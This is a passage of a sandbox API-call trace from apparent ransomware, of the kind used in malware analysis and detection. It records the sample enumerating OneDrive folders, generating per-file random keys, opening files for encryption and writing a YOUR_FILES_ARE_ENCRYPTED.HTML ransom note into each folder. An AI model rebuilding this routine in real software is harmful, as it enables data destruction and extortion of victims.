lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png" [0162.085] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.085] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0162.085] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4862730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4862730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4862730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x6c00a, dwReserved0=0x0, dwReserved1=0x60, cFileName="ScreenshotOptIn.png", cAlternateFileName="SCREEN~2.PNG")) returned 1 [0162.085] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png") returned 91 [0162.085] lstrcmpW (lpString1="ScreenshotOptIn.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.085] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0162.085] lstrlenW (lpString=".png") returned 4 [0162.085] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0162.085] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\screenshotoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0162.086] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=442378) returned 1 [0162.086] GetProcessHeap () returned 0x270000 [0162.086] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0162.088] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="9F") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="3B") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="F6") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="7F") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="4C") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="90") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="68") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="38") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="60") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="0A") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="8A") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="5E") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="99") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="8C") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="80") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="27") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="03") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="4F") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="06") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="C2") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="43") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="AB") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="1D") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="EC") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F7") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="F3") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="75") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="1F") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="4D") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="35") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="A6") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="5F") returned 2 [0162.090] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png" [0162.090] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.090] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0162.092] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9fdcfb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sd-arab", cAlternateFileName="")) returned 1 [0162.092] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab") returned 79 [0162.092] GetProcessHeap () returned 0x270000 [0162.092] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.092] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab" [0162.092] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\*" [0162.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9fdcfb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.096] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9fdcfb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.096] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.096] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\FileSync.LocalizedResources.dll.mui") returned 115 [0162.096] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.096] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.096] lstrlenW (lpString=".mui") returned 4 [0162.096] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.096] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.096] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.096] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0162.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sd-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.272] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.275] CloseHandle (hObject=0x594) returned 1 [0162.275] GetProcessHeap () returned 0x270000 [0162.276] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.284] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sd-arab-pk", cAlternateFileName="SD-ARA~1")) returned 1 [0162.284] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk") returned 82 [0162.284] GetProcessHeap () returned 0x270000 [0162.284] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.285] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk" [0162.285] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\*" [0162.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.286] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.286] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.286] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.286] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.287] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.287] lstrlenW (lpString=".mui") returned 4 [0162.287] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.287] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.287] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.287] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sd-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.288] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.290] CloseHandle (hObject=0x594) returned 1 [0162.291] GetProcessHeap () returned 0x270000 [0162.292] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.292] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="si-lk", cAlternateFileName="")) returned 1 [0162.292] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk") returned 77 [0162.292] GetProcessHeap () returned 0x270000 [0162.292] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.292] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk" [0162.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\*" [0162.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.293] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.293] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.293] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.293] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.293] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.293] lstrlenW (lpString=".mui") returned 4 [0162.293] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.293] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.293] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.294] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\si-lk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.294] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.297] CloseHandle (hObject=0x594) returned 1 [0162.297] GetProcessHeap () returned 0x270000 [0162.298] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.298] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sk", cAlternateFileName="")) returned 1 [0162.299] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk") returned 74 [0162.299] GetProcessHeap () returned 0x270000 [0162.299] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.299] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk" [0162.406] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk", lpString2="\\*" | out: 